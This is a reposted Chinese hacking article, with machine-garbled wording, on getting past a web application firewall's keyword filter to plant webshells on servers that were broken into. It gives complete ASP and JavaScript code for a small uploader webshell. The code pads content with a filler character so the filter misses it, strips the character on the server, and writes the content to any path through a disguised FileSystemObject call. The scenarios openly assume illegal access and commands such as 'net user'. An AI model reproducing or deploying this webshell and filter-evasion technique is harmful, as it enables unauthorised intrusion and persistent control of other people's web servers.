一流监控系统上传限制级文本的冲破[网络技术]
本文“一流监控系统上传限制级文本的冲破[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
情形1:
某黑客通过不法途径上传了一个小马,预备上传大马大开杀戒的时刻,发现:一流拦阻系统提醒您,您提交的数据含有不法字符,提交失利
情形2:
某黑客通过不法途径远程了一个大马,传上cmd,预备履行net user时,发现:一流拦阻系统提醒您,您提交的数据含有不法字符,提交失利
情形3:....
以上情形都是在表单提交呈现了也就是post
百度,谷歌一搜,很多冲破一流拦阻系统持续注射的例子(get方法),而冲破一流拦阻系统上传大马仿佛还没有(大概我孤陋寡闻,只看过xml远程下载保存,有看到的牛请奉告我啊)
办理:
我们提交select会被拦阻(如无分外指出,都为post),但是我们提交 s鱼e鱼l鱼e鱼c鱼t 那就不会被拦阻了
也就是我们在提交时,将文本内容举行加密,提交到服务器后,在举行重新解密,这样就可以绕过一流拦阻系统了
一下是一个自己测试用的小马
这个小马的缺陷:由于加密时是把整个文本举行加密的,所以上传的文本大小为本来的3倍,本地测试时传大马,卡半天
不过这个可以增添关键字来办理,处理文本时把select等关键字举行加密就行了
一点小思绪,举一反三 by 3x
<html>
<head>
<title></title>
</head>
<script>
function change()
{
var tp="";
s=document.getElementsByName("content")[0].value;
a=s.split(’’);
for(var i=0;i<a.length;i=i+1)
{
tp=tp+a[i]+"鱼";
}
tp=tp.replace("\’","‘")
document.getElementsByName("content")[0].value=tp;
}
</script>
<body>
<%
on error resume next
if request("path")<>"" then
temp="scrip"&"ting.f"&"ilesyst"&"emobject"
set fso=server.createobject(temp)
response.write request.Form&""
path=request("path")
dama=replace(request("content"),"鱼","")
dama=replace(dama,"’","’")
dama=replace(dama,"‘","’")
set f=fso.createtextfile(path,true)
f.write dama
if err=0 then
response.write "成功"
else
response.write "失利"
err.clear
end if
set f=nothing
set fso=nothing
end if
%>
<form method="post" action="">
<table>
<tr><td>当前途径 <%=server.mappath(request.servervariables("script_name"))%></td></tr>
<tr><td>保存途径 <input type="text" name="path" size="40"> <input type="submit" xxxxx="change()" value="go"></td></tr>
<tr><td><textarea name="content" rows="20" cols="50" >
</textarea></td></tr>
<tr><td></td></tr>
</table>
</form>
</body>
</html>
以上是“一流监控系统上传限制级文本的冲破[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |